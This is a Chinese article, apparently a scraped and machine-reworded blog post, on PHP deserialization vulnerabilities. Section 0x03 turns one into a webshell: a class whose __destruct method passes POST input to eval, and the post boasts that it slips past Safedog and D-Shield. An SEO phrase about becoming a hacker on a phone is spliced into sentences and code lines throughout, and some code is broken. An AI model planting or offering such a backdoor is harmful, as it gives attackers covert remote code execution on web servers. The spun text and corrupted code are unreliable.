如何在手机上成为一名黑客-海蓝公司的破密软件-PHP反序列化漏洞与Webshell

近期和朋友们一起科学研究了下PHP反序列化漏洞，心血来潮，利用反序列化漏洞写一个一句话木马实际效果应当蛮非常好的。因此便有此篇。

0x01 PHP反序列化

谈起PHP反序列化，那务必先简易说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串数组等转换为字节流有助于传送，例如跨脚本 *** 等。而PHP反序列化是将序列化以后的字节流转变成对象、标识符、数怎样在手机上变成一名 *** 黑客组等。可是PHP序列化是不容易储存对象的方式。

    <?php

    class A{

            var $test = "demo";

    }

    $a = new A();  // 形成a对象

    $b = serialize($a);  // 序列化a对象为b

    $c = unserialize($b); 怎样在手机上变成一名 *** 黑客 // 反序列化b对象为c

    print_r($b);   // 輸出序列化以后的值:O:1:"A":1:{s:4:"test";s:4:"demo";}

    echo "\ ";

    print_r($c->test);  // 輸出对象c中test的值:demo

    ?>

0x02 PHP反序列化漏洞

PHP类中有一种特殊函数体的存有叫法术涵数，magic涵数取名是以标记__开始的，例如 __construct, __destruct, __toString, __sleep, __wakeup这些。这种涵数在一些状况下能全自动启用，例如__construct当一个对象建立时被启用，__destruct当一个对象消毁时被启用，__toString当一个对象被作为一个字符串数组应用。

而在反序列化时，假如反序列化对象中存有法术涵数，应用unserialize()涵数另外也会开启。那样怎样在手机上变成一名 *** 黑客，一旦大家可以操纵unserialize()通道，那麼就很有可能引起对象引入漏洞。

    <?php

    class A{

            var $test = "demo";

            function __destruct(){

                echo $this->test;

    怎样在手机上变成一名 *** 黑客         }

    }

    $a = $_GET['test'];

    $a_unser = unserialize($a);

    ?>

例如所述编码，结构payload为http://127.0.0.1:800/test.php?test=O:1:"A":1:{s:4:"test";s:5:"hello";}

反序列化后在脚本 *** 运作完毕时便会启用_destruct涵数，另外会遮盖test自变量輸出hello。

0x03 回马枪

我们可以利用该漏洞点，操纵键入自变量，拼凑成一个序列化对象。随后再结构一个法术涵数，例如在_destruct()涵数中启用eval实行序列化对象中的句子。

  怎样在手机上变成一名 *** 黑客   <?php

    class A{

            var $test = "demo";

            function __destruct(){

                    @eval($this->test);

    怎样在手机上变成一名 *** 黑客         }

    }

    $test = $_POST['test'];

    $len = strlen($test) 1;

    $pp = "O:1:\\"A\\":1:{s:4:\\"test\\";s:".$len.":\\"".$test.";\\";}"; // 结构序列化对象

    $test_unser = unserialize($pp); // 怎样在手机上变成一名 *** 黑客 反序列化另外开启_destruct涵数

    ?>

0x04 实际效果演试

立即水果刀连接：

安全狗：

此木马病毒终究是跟一切正常文档太像，因此 免杀实际效果很非常好。这儿仅仅检测了安全狗、D盾，其他测试。

总结